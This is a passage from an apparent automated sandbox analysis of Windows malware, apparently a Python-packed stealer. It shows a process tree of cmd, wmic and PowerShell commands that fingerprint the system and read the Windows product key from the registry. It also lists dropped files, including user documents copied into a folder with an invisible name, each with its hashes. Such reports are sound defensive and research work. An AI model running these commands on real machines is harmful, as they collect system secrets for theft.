                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                              wmic os get Caption
                                                                              4⤵
                                                                                PID:3500
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                              3⤵
                                                                                PID:744
                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                  wmic computersystem get totalphysicalmemory
                                                                                  4⤵
                                                                                    PID:4872
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                  3⤵
                                                                                    PID:2288
                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                      wmic csproduct get uuid
                                                                                      4⤵
                                                                                        PID:3352
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                      3⤵
                                                                                        PID:1896
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                          4⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          PID:4624
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                        3⤵
                                                                                          PID:4236
                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                            wmic path win32_VideoController get name
                                                                                            4⤵
                                                                                            • Detects videocard installed
                                                                                            PID:2924
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                          3⤵
                                                                                            PID:2020
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                              4⤵
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              PID:816

                                                                                      Network

                                                                                      MITRE ATT&CK Enterprise v15

                                                                                      Replay Monitor

                                                                                      Loading Replay Monitor...

                                                                                      Downloads

                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                        Filesize

                                                                                        2KB

                                                                                        MD5

                                                                                        d85ba6ff808d9e5444a4b369f5bc2730

                                                                                        SHA1

                                                                                        31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                        SHA256

                                                                                        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                        SHA512

                                                                                        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                        Filesize

                                                                                        944B

                                                                                        MD5

                                                                                        2e907f77659a6601fcc408274894da2e

                                                                                        SHA1

                                                                                        9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

                                                                                        SHA256

                                                                                        385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

                                                                                        SHA512

                                                                                        34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                        Filesize

                                                                                        944B

                                                                                        MD5

                                                                                        80175410d97c1531fc710a687c1081bd

                                                                                        SHA1

                                                                                        2675b7099d15f28883a0670410d1945e4a2afea6

                                                                                        SHA256

                                                                                        ee7514827be7d5dec0fb83272d438c94d156dd3c66ae0219eeb6d68fbacf21bb

                                                                                        SHA512

                                                                                        82308760eb080fdf35b841932da977aafa6f7e6b31a306296fcf87697c4da0f27b9c5b1839c3044c2e8d7b42d84721e170d4fad2b3d3eaed69ac597065546e3b

                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                        Filesize

                                                                                        1KB

                                                                                        MD5

                                                                                        273d391a4078e9c5bb8b7552c37c5cfc

                                                                                        SHA1

                                                                                        ae1d26327705c1a56e9350afe885d0906d154bd0

                                                                                        SHA256

                                                                                        fc8bad33553bd9ef710ae28f3ba6aece0bb9e7ca2a87a5f115e88e164c21605b

                                                                                        SHA512

                                                                                        72888c217c75eda761a6e7dcaf43e3f4290c48d1700bb4b55ffdfe441f9593319b3807c539c2c266c6643fd26520b7aa0d10a1f0570de838367131d38df42c99

                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                        Filesize

                                                                                        1KB

                                                                                        MD5

                                                                                        88be3bc8a7f90e3953298c0fdbec4d72

                                                                                        SHA1

                                                                                        f4969784ad421cc80ef45608727aacd0f6bf2e4b

                                                                                        SHA256

                                                                                        533c8470b41084e40c5660569ebbdb7496520d449629a235e8053e84025f348a

                                                                                        SHA512

                                                                                        4fce64e2dacddbc03314048fef1ce356ee2647c14733da121c23c65507eeb8d721d6b690ad5463319b364dc4fa95904ad6ab096907f32918e3406ef438a6ef7c

                                                                                      • C:\Users\Admin\AppData\Local\Temp\RESC4B7.tmp

                                                                                        Filesize

                                                                                        1KB

                                                                                        MD5

                                                                                        cc3b7f79c92f9930f1a39323c5994322

                                                                                        SHA1

                                                                                        0135de16e6a95c1cd55be4f909e61c996f6b26ee

                                                                                        SHA256

                                                                                        03ebaf0754249b6750cbf1d2683f1465efcea8d4f32e2eafa346c99a7fbc7654

                                                                                        SHA512

                                                                                        0abcf15e2ed4c3945afcf07d18baf89b749708d8ddf253a59f4dec467e8ab9406ee157ab578fc8f06600f3382299e79e263fcdcb439768965d88e19575c0a598

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI24202\VCRUNTIME140.dll

                                                                                        Filesize

                                                                                        106KB

                                                                                        MD5

                                                                                        4585a96cc4eef6aafd5e27ea09147dc6

                                                                                        SHA1

                                                                                        489cfff1b19abbec98fda26ac8958005e88dd0cb

                                                                                        SHA256

                                                                                        a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736

                                                                                        SHA512

                                                                                        d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI24202\_bz2.pyd

                                                                                        Filesize

                                                                                        48KB

                                                                                        MD5

                                                                                        85c70974fac8e621ed6e3e9a993fbd6f

                                                                                        SHA1

                                                                                        f83974e64aa57d7d027b815e95ebd7c8e45530f1

                                                                                        SHA256

                                                                                        610983bbcb8ee27963c17ead15e69ad76ec78fac64deb7345ca90d004034cdd6

                                                                                        SHA512

                                                                                        142792750e4a5189dbeaa710e3f5b3689d593927ea77ded00eb5caada6b88d82a37459770845f1ea7c9f45da5a6ae70e19bfcf76d9f1a56184c3164b736bcb18

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI24202\_ctypes.pyd

                                                                                        Filesize

                                                                                        59KB

                                                                                        MD5

                                                                                        e7ef30080c1785baf2f9bb8cf5afe1b2

                                                                                        SHA1

                                                                                        b7d7d0e3b15de9b1e177b57fd476cecbdd4fcb79

                                                                                        SHA256

                                                                                        2891382070373d5070cb8fd6676afc9f5eb4236251f8fc5c0941af0c53a2d31e

                                                                                        SHA512

                                                                                        c2ec431d2821879bb505d8eca13fa3921db016e00b8674fa62b03f27dc5cee6dd0de16ba567d19d4b0af9a5cb34d544383a68cc63ff2fa9d8bb55e356d0d73e6

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI24202\_decimal.pyd

                                                                                        Filesize

                                                                                        105KB

                                                                                        MD5

                                                                                        3923e27b9378da500039e996222ffee6

                                                                                        SHA1

                                                                                        a9280559a71abf390348e1b6a0fb1f2409649189

                                                                                        SHA256

                                                                                        0275b03041f966e587d1c4c50266c3fdff1e1a65f652ad07b59cb85845b5457e

                                                                                        SHA512

                                                                                        051c613403fd80b9582dd48c1f38870cb26846d54b75603ea52a78202a72272107e95750de78cd8f6c56951ebde501b4892d90fb306326b86124c8cc97bca594

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI24202\_hashlib.pyd

                                                                                        Filesize

                                                                                        35KB

                                                                                        MD5

                                                                                        c8b153f0be8569ce2c2de3d55952d9c7

                                                                                        SHA1

                                                                                        0861d6dcd9b28abb8b69048caf3c073e94f87fdc

                                                                                        SHA256

                                                                                        af9f39d2a5d762214f6de2c8fec0a5bc6be0b8223ef47164caa4c6e3d6437a58

                                                                                        SHA512

                                                                                        81ccbfff0f4cdd1502af9d73928b940098b9acc58b19c1a939ecdf17418096294af4a4529ee7a0bbe1c686e3b0254651e211c1093264d1835065a82711ac0379

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI24202\_lzma.pyd

                                                                                        Filesize

                                                                                        85KB

                                                                                        MD5

                                                                                        bc2ebd2a95619ab14a16944b0ab8bde5

                                                                                        SHA1

                                                                                        c31ba45b911a2664fc622bb253374ab7512fc35a

                                                                                        SHA256

                                                                                        aeb3fd8b855b35204b5088c7a1591cc1ca78fffe707d70e41d99564b6cb617c6

                                                                                        SHA512

                                                                                        86a6685efec72860991c0f0fa50f46a208211d3f8fc44012b12437d141c5f1a24c34a366f164d225869680707b482ab27a2720c698ebe8026f1c5807e81f8437

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI24202\_queue.pyd

                                                                                        Filesize

                                                                                        26KB

                                                                                        MD5

                                                                                        fcbb24550f59068a37ea09a490923c8a

                                                                                        SHA1

                                                                                        1e51d9c156354e00909c9f016ddb392a832f8078

                                                                                        SHA256

                                                                                        de2ac6d99234a28dcf583d90dca7256de986fca9e896c9aafd1f18bb536978b8

                                                                                        SHA512

                                                                                        62474bf9d5f39591240f71fd9270fcc7a2b2c0b4a1f93cbb57021040ad85b3ab8c401d17aedf0141105118772f453c6137a026736f069cc7a965cb30e5479f07

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI24202\_socket.pyd

                                                                                        Filesize

                                                                                        44KB

                                                                                        MD5

                                                                                        f6d0876b14bca5a264ec231895d80072

                                                                                        SHA1

                                                                                        d68b662cfc247c07851ef0764fe9652e3e2c0981

                                                                                        SHA256

                                                                                        bcbf9a952473e53f130ce77b0db69fe08c5845ce10dbe8c320b40f171a15d6a8

                                                                                        SHA512

                                                                                        1db02975634ffcc4e73fac355d7f67a915c3b4189feaf9e7b24ef831e9f4a2e60a4bd1ebfd8157282a4094814332d62957fcd204b20f2904527e203ab355ab8e

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI24202\_sqlite3.pyd

                                                                                        Filesize

                                                                                        57KB

                                                                                        MD5

                                                                                        0fdedcb9b3a45152239ca4b1aea4b211

                                                                                        SHA1

                                                                                        1ccff1f5e7b27c4156a231ad7a03bcc9695c5b92

                                                                                        SHA256

                                                                                        0fc03d25467850181c0fc4f0f8919c8c47cba2bf578698d4354aa84fd810c7f7

                                                                                        SHA512

                                                                                        8ce5b38ee64ac0cda831b6b2c746fb95baadda83665d8e125eaa8b4a07cb61b3ef88d60741b978b2108ec08b067f1c9c934099f539b1e24f55e3ca8350359611

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI24202\_ssl.pyd

                                                                                        Filesize

                                                                                        65KB

                                                                                        MD5

                                                                                        53996068ae9cf68619da8cb142410d5e

                                                                                        SHA1

                                                                                        9eb7465d6f22ab03dac04cfce668811a87e198f2

                                                                                        SHA256

                                                                                        cbd320c42277086cd962fd0b25842904ceb436346d380319625f54363f031dcf

                                                                                        SHA512

                                                                                        d5fbc53a2fffecb1f3da4b126e306961de3b8070b5f722b6ed5e20bef6af48d52edf96c975f68278e337bc78a25b4227e9eb44b51baa786365a67cf977e4643e

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI24202\base_library.zip

                                                                                        Filesize

                                                                                        1.3MB

                                                                                        MD5

                                                                                        898e35281a756640780dbc31a0b78452

                                                                                        SHA1

                                                                                        845b59cfd9fb152725f250a872e9d1d7a66af258

                                                                                        SHA256

                                                                                        0daa440c78582a693dabbc2325a06d817131bb170bad436b126bad896f1377cd

                                                                                        SHA512

                                                                                        421cc4a15e94293e53f1039b8bb5be7edcbc8e3e0e4abc7f34faf991993f51cb5f51493b58bb341cb9579347ec134b02104454075a8e7e33e45b8e3a66a44d79

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI24202\blank.aes

                                                                                        Filesize

                                                                                        107KB

                                                                                        MD5

                                                                                        36efab2d4f57bdc80150e979cea90949

                                                                                        SHA1

                                                                                        81b9d016b4759f7384400c15f146769d88c11bd9

                                                                                        SHA256

                                                                                        79ba02e53b4c4e21eb8bd2f150d2fc424e72f38ac36eb635da40271c69dbac90

                                                                                        SHA512

                                                                                        d5b7b894172c2c393a4bc26462afd4e3da75e42ad0f1476280c9b8cf46685e16444fec9311a0a639b5d21936356bc2799e456a612cf65ef3af6820662db4b28a

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI24202\libcrypto-3.dll

                                                                                        Filesize

                                                                                        1.6MB

                                                                                        MD5

                                                                                        27515b5bb912701abb4dfad186b1da1f

                                                                                        SHA1

                                                                                        3fcc7e9c909b8d46a2566fb3b1405a1c1e54d411

                                                                                        SHA256

                                                                                        fe80bd2568f8628032921fe7107bd611257ff64c679c6386ef24ba25271b348a

                                                                                        SHA512

                                                                                        087dfdede2a2e6edb3131f4fde2c4df25161bee9578247ce5ec2bce03e17834898eb8d18d1c694e4a8c5554ad41392d957e750239d3684a51a19993d3f32613c

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI24202\libffi-8.dll

                                                                                        Filesize

                                                                                        29KB

                                                                                        MD5

                                                                                        08b000c3d990bc018fcb91a1e175e06e

                                                                                        SHA1

                                                                                        bd0ce09bb3414d11c91316113c2becfff0862d0d

                                                                                        SHA256

                                                                                        135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

                                                                                        SHA512

                                                                                        8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI24202\libssl-3.dll

                                                                                        Filesize

                                                                                        223KB

                                                                                        MD5

                                                                                        6eda5a055b164e5e798429dcd94f5b88

                                                                                        SHA1

                                                                                        2c5494379d1efe6b0a101801e09f10a7cb82dbe9

                                                                                        SHA256

                                                                                        377da6175c8a3815d164561350ae1df22e024bc84c55ae5d2583b51dfd0a19a8

                                                                                        SHA512

                                                                                        74283b4051751f9e4fd0f4b92ca4b953226c155fe4730d737d7ce41a563d6f212da770e96506d1713d8327d6fef94bae4528336ebcfb07e779de0e0f0cb31f2e

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI24202\python312.dll

                                                                                        Filesize

                                                                                        1.7MB

                                                                                        MD5

                                                                                        86d9b8b15b0340d6ec235e980c05c3be

                                                                                        SHA1

                                                                                        a03bdd45215a0381dcb3b22408dbc1f564661c73

                                                                                        SHA256

                                                                                        12dbbcd67015d6cdb680752184107b7deb84e906b0e8e860385f85d33858a5f6

                                                                                        SHA512

                                                                                        d360cc3f00d90fd04cbba09d879e2826968df0c1fdc44890c60b8450fe028c3e767450c3543c62d4f284fb7e004a9a33c52538c2279221ee6cbdb1a9485f88b2

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI24202\rar.exe

                                                                                        Filesize

                                                                                        615KB

                                                                                        MD5

                                                                                        9c223575ae5b9544bc3d69ac6364f75e

                                                                                        SHA1

                                                                                        8a1cb5ee02c742e937febc57609ac312247ba386

                                                                                        SHA256

                                                                                        90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

                                                                                        SHA512

                                                                                        57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI24202\rarreg.key

                                                                                        Filesize

                                                                                        456B

                                                                                        MD5

                                                                                        4531984cad7dacf24c086830068c4abe

                                                                                        SHA1

                                                                                        fa7c8c46677af01a83cf652ef30ba39b2aae14c3

                                                                                        SHA256

                                                                                        58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

                                                                                        SHA512

                                                                                        00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI24202\select.pyd

                                                                                        Filesize

                                                                                        25KB

                                                                                        MD5

                                                                                        cce3e60ec05c80f5f5ee014bc933554c

                                                                                        SHA1

                                                                                        468d2757b201d6259034215cfd912e8e883f4b9e

                                                                                        SHA256

                                                                                        84a81cca6d80edd9ec2d31926231de393ed7f26ed86ae39219adc5eab24b8100

                                                                                        SHA512

                                                                                        7cbcee4dd4c817fbef8b9aef2d457b56970c5e5c03bdf2caf74415316b44e7da33ee39b6a434f4760c80f74c33b5c0c5ad00936d438b947a39ffcd53e890cf0c

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI24202\sqlite3.dll

                                                                                        Filesize

                                                                                        622KB

                                                                                        MD5

                                                                                        c6ed91b8fdb99eba4c099eb6d0eea5d9

                                                                                        SHA1

                                                                                        915b2d004f3f07cd18610e413b087568258da866

                                                                                        SHA256

                                                                                        e6e1910e237ac7847748918804d1c414c0f1696a29e9718739312a233eb96d80

                                                                                        SHA512

                                                                                        92fe738fcd75e39c6bc9f1edb3b16a1a7cf3ae6c0d2c29c721b1a5bd3e07a4bb8e8295b3ad3cb44bcee05a8110855b0fea66b156461c4f1761c53c15d7e67ee5

                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI24202\unicodedata.pyd

                                                                                        Filesize

                                                                                        295KB

                                                                                        MD5

                                                                                        427668e55e99222b3f031b46fb888f3a

                                                                                        SHA1

                                                                                        c9be630cb2536c20bbc6fc9ba4a57889cdb684bc

                                                                                        SHA256

                                                                                        9ca1b01048d3867cb002a01a148f279ba9edaf7b7ad04d17e3e911e445f2d831

                                                                                        SHA512

                                                                                        e5ca0ddc2758891090db726de2d3fd7f2ba64e309979136b4d3299445b1f751dfd8cd56bb3343499cb6ed479c08732d1d349d32b7f7e5ac417352bd0ce676253

                                                                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_txmgz11t.o0w.ps1

                                                                                        Filesize

                                                                                        60B

                                                                                        MD5

                                                                                        d17fe0a3f47be24a6453e9ef58c94641

                                                                                        SHA1

                                                                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                        SHA256

                                                                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                        SHA512

                                                                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                      • C:\Users\Admin\AppData\Local\Temp\kql45a3i\kql45a3i.dll

                                                                                        Filesize

                                                                                        4KB

                                                                                        MD5

                                                                                        1ae22161a3e03cd8f3eb1270ca448b31

                                                                                        SHA1

                                                                                        6cd6bc093046f219b1afc420ac700b0d10002707

                                                                                        SHA256

                                                                                        4a9b5325f5be6fbc070a35b29d9710bb77b0d4254b7c64056378202f0a18deeb

                                                                                        SHA512

                                                                                        54a26523966f9f381ba49e912cff66ae3c35332cc28777f7a87010f540cda137fffac0c39ce3a3ee753b8a1a31f5e38c9b25faed8df4cbd0e686e25b142c5173

                                                                                      • C:\Users\Admin\AppData\Local\Temp\​ ‏ ‌    ‏\Common Files\Desktop\DenySave.xlsx

                                                                                        Filesize

                                                                                        12KB

                                                                                        MD5

                                                                                        b2104e8c77a6da8fc6e114a3695e55a9

                                                                                        SHA1

                                                                                        4ef9c2788ecc707743211c89abb40c8cd2b59911

                                                                                        SHA256

                                                                                        e6feea274ba00d231b39944c90cd4a8d093e176439281d84a52b9020f6f151f6

                                                                                        SHA512

                                                                                        043626b8ca9e5390c485057462eea6f6145899aa14ce9eaf1d9683d7e16df971c2caf3bee1ccf1ca72239bc60bae2619fa887559b85c5c34c8ae48ac82ca60f4

                                                                                      • C:\Users\Admin\AppData\Local\Temp\​ ‏ ‌    ‏\Common Files\Desktop\ExpandBackup.docx

                                                                                        Filesize

                                                                                        19KB

                                                                                        MD5

                                                                                        bf016a1031214e8e6d76a211d3fc9c5f

                                                                                        SHA1

                                                                                        8e8d066bf2a212084d801349cfe84cbb05a37d3d

                                                                                        SHA256

                                                                                        70eb7a105e87de65e9beb7411d22c8daea407811fca328f37acaee6ec299d38a

                                                                                        SHA512

                                                                                        24a971864bb5688579bfe2835a22e3acd90201d8b6adb1db5d2f11d6beea1ce2429cff70a5bf7756b5f75c3dee916f1639b36d71fea44360e7e64a4ccac00f64

                                                                                      • C:\Users\Admin\AppData\Local\Temp\​ ‏ ‌    ‏\Common Files\Desktop\ExportGet.png

                                                                                        Filesize

                                                                                        457KB

                                                                                        MD5

                                                                                        508e7c8f620edd2e6c597dfc4a03bc3c

                                                                                        SHA1

                                                                                        25573a93fc32421f9326b60683436012672d14de

                                                                                        SHA256

                                                                                        e551fe89a5d5ffa55df8c60e8e24ba2386285cb883954bdaf83e42412f605e2b

                                                                                        SHA512

                                                                                        d10a2c9e6d7c7a3d97d92a355a3eed030742b720b7560fd940940e7b5b3656f54d89eaf1540a2ada0534a4d6cc57ef46883a38c21cd4f96d755b495c4c06aa98

                                                                                      • C:\Users\Admin\AppData\Local\Temp\​ ‏ ‌    ‏\Common Files\Desktop\InitializePing.docx

                                                                                        Filesize

                                                                                        16KB

                                                                                        MD5

                                                                                        8448f6f6174151b1ba3fc99513caf244

                                                                                        SHA1

                                                                                        c1a5724134705a330e49ac6365fe47979d8b5b73

                                                                                        SHA256

                                                                                        a5de4f07f87ab9109d642678eabdc3d11337157afc44bb665c67799477eb2cdd

                                                                                        SHA512

                                                                                        a4b7c6367cf765b251e4fbc0051d9623fc63eeaa791dbc2652cad45da405c7cfe88294fbf3cb3c0bab061b8fb08d12f6c9175f9a28a97ad45ff1ff4ee79ee135

                                                                                      • C:\Users\Admin\AppData\Local\Temp\​ ‏ ‌    ‏\Common Files\Desktop\RegisterShow.txt

                                                                                        Filesize

                                                                                        652KB

                                                                                        MD5

                                                                                        dc9b6c573566cb264a84ecbeb551183c

                                                                                        SHA1

                                                                                        8d8fcd765452ff436d9130d606a0b96bc9d4ac7b

                                                                                        SHA256

                                                                                        dc0bf2aa691ae7c8f106331530eb63077372035b7aed6d4c8f5fd322e662c815

                                                                                        SHA512

                                                                                        9feac23bb974f739b9018dd70bba6931aea53aebd9970bd4b682a4896b2925b049e800584553d50a04e61c85cc6aa1e4f5faad42b19d2905140481b03d439caf

                                                                                      • C:\Users\Admin\AppData\Local\Temp\​ ‏ ‌    ‏\Common Files\Desktop\UnpublishDeny.xlsx

                                                                                        Filesize

                                                                                        10KB

                                                                                        MD5

                                                                                        06d2060b890c79b2ce16238d049c5864

                                                                                        SHA1

                                                                                        aaa1a40187720a26190c7f59755df65d98b18a54

                                                                                        SHA256

                                                                                        77d7c3f39ef99f820f7d3a7d0d59993edb04ab7e5c298d65d3b2476083863be8

                                                                                        SHA512

                                                                                        aed6c67fb0002ff1df7f7bf05c25838a5172945275efc9b32fc4e3c6589cc3c5c43167df87e2595f2c2f58ddbed15eb20664a497e1aca1d86d751aa6e9953793

                                                                                      • C:\Users\Admin\AppData\Local\Temp\​ ‏ ‌    ‏\Common Files\Desktop\WaitRequest.pdf

                                                                                        Filesize

                                                                                        633KB

                                                                                        MD5

                                                                                        28821afabc507ddbb41f9fb7e1b3f811

                                                                                        SHA1

                                                                                        c632a6fd5e5505894a34f502f8da2a46fde4fa32

                                                                                        SHA256

                                                                                        74f9bfd4bd022156cc0657731724d591cb4cd43e09736fa487d3b538f08b34fc

                                                                                        SHA512

                                                                                        b284c9983c7856bf95b37cc7de5f2a428d61d6e90f79cb51d9252576322fdd1e35090d0dd36c7a575b52024b934c6919ccc7db1e9ecf4ab00bdab280a55a59e5

                                                                                      • C:\Users\Admin\AppData\Local\Temp\​ ‏ ‌    ‏\Common Files\Downloads\CompressBackup.png

                                                                                        Filesize

                                                                                        617KB

                                                                                        MD5

                                                                                        65f452beba2c26da64fb5725b94c8af0

                                                                                        SHA1

                                                                                        abe7b72d17820792b332260aebaebeb945c9a80b

                                                                                        SHA256

                                                                                        864e5ba0142ddb730308def3bdbcf6de62b2b359764eea8f6b264f842a5afd3d

                                                                                        SHA512

                                                                                        ac4a466b2529adf14ca28994c4845dac4957646dcbffe76d09f4af33242fc51ab19710e61493c3d3c31a64520d07db680581e7a60b7e15465553d0e636cdef9d

                                                                                      • C:\Users\Admin\AppData\Local\Temp\​ ‏ ‌    ‏\Common Files\Downloads\DenyEnter.jpeg

                                                                                        Filesize

                                                                                        633KB

                                                                                        MD5

                                                                                        b7654d1728fd8f7af39e894d61da3267

                                                                                        SHA1

                                                                                        a79deceb9f4d680450d40273b6ceefab15e41b4d

                                                                                        SHA256

                                                                                        7dad9aaac7f5325d111a207af43360abf1d9a8d6b9a5fa583a161c100ae140b8

                                                                                        SHA512

                                                                                        1f525b2a482d91fc4c75b8bf34f8cfd40c42ea7e5e597cd43f2140d542d71aad86bd2ef55a0d7e40fafc0b3257711aa38edfedbde3b76187f06c300e130ebaca

                                                                                      • C:\Users\Admin\AppData\Local\Temp\​ ‏ ‌    ‏\Common Files\Downloads\SyncSave.jpeg

                                                                                        Filesize

                                                                                        353KB

                                                                                        MD5

                                                                                        87313b72fb7fc10bd1d53315d5645324

                                                                                        SHA1

                                                                                        1dde5838d15bedda3fa72f111c772809b64cba0c

                                                                                        SHA256

                                                                                        4002a3408cbc273b0e9d6c81d3596c00893c410c62cd8ea523f6869ea8adf69c

                                                                                        SHA512

                                                                                        0fd514dcab8f279cca7d7f47ebb9ed2b86b3ffa6a072eb9200c16aa04d6cbbe33c1c42b1669259e69a9ddc47d3bc6003257bec1629424b3072083b6e3abfbfc9

                                                                                      • C:\Users\Admin\AppData\Local\Temp\​ ‏ ‌    ‏\Common Files\Music\OptimizeBackup.rtf

                                                                                        Filesize

                                                                                        183KB

                                                                                        MD5

                                                                                        711cc63e6e8c51f652637e73a4bb41cb

                                                                                        SHA1

                                                                                        99cd7dde5f9b60109b4b5eb2b52f29f0d2d53e63

                                                                                        SHA256

                                                                                        a50c283dbc248db16151d3e5f0f8cbc57e6ffbf9a4399d85095a8884bb35dcd1

                                                                                        SHA512

                                                                                        60856966848b9d64d52b720f4d457a829116109c7fe5a73808081d8b892f83b09e104f2565c85e7250c12e696bbf80a5948ab0772b1a1f753396188fcc6fdc4b

                                                                                      • C:\Users\Admin\AppData\Local\Temp\​ ‏ ‌    ‏\Common Files\Music\TraceRevoke.doc

                                                                                        Filesize

                                                                                        246KB

                                                                                        MD5

                                                                                        0544095a4954eaeb744e64439c0d8d7f

                                                                                        SHA1

                                                                                        4b545c6440be47d403a5a65f90f95f687e1b0358

                                                                                        SHA256

                                                                                        bb03a81e40a4a6074cc1f77f48ecb5702f5fedf349dc640f686956cc74178b9e

                                                                                        SHA512

                                                                                        96a6ed21982dfcbab44be5c181dd016913676f9ba38d0947b5e2f7f5503aae9beec71ced7dfcdb38350493bf3ecd77c41a8200136e9934ce5c401e86a5ed53ce

                                                                                      • C:\Users\Admin\AppData\Local\Temp\​ ‏ ‌    ‏\Common Files\Pictures\HideCompress.jpeg

                                                                                        Filesize

                                                                                        753KB

                                                                                        MD5

                                                                                        f1c006c82d82f0526d03ee6051475f25

                                                                                        SHA1

                                                                                        7fc711ffa1674f0cb3ba4baf4acd36d9abe020d5

                                                                                        SHA256

                                                                                        02ac5b07bb4de30228d6f2b1be44724671a78e6ff37cea2cf6a3118986294f18

                                                                                        SHA512

                                                                                        38c7bc778db3382603381c5cee16aa6547f3126447e8461436d4078fdd31c8853e8e516a5f25df9b65dcd78f99954a5f854e8cce1b8984929c1f63eec6b440c6

                                                                                      • C:\Windows\System32\drivers\etc\hosts

                                                                                        Filesize

                                                                                        2KB

                                                                                        MD5

                                                                                        f99e42cdd8b2f9f1a3c062fe9cf6e131

                                                                                        SHA1

                                                                                        e32bdcab8da0e3cdafb6e3876763cee002ab7307

                                                                                        SHA256

                                                                                        a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

                                                                                        SHA512

                                                                                        c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

                                                                                      • \??\c:\Users\Admin\AppData\Local\Temp\kql45a3i\CSC83BF3F3075B849E7921C621D5BABD469.TMP

                                                                                        Filesize

                                                                                        652B

                                                                                        MD5

                                                                                        0ac43d7e506611264ac53bdb247201ca

                                                                                        SHA1

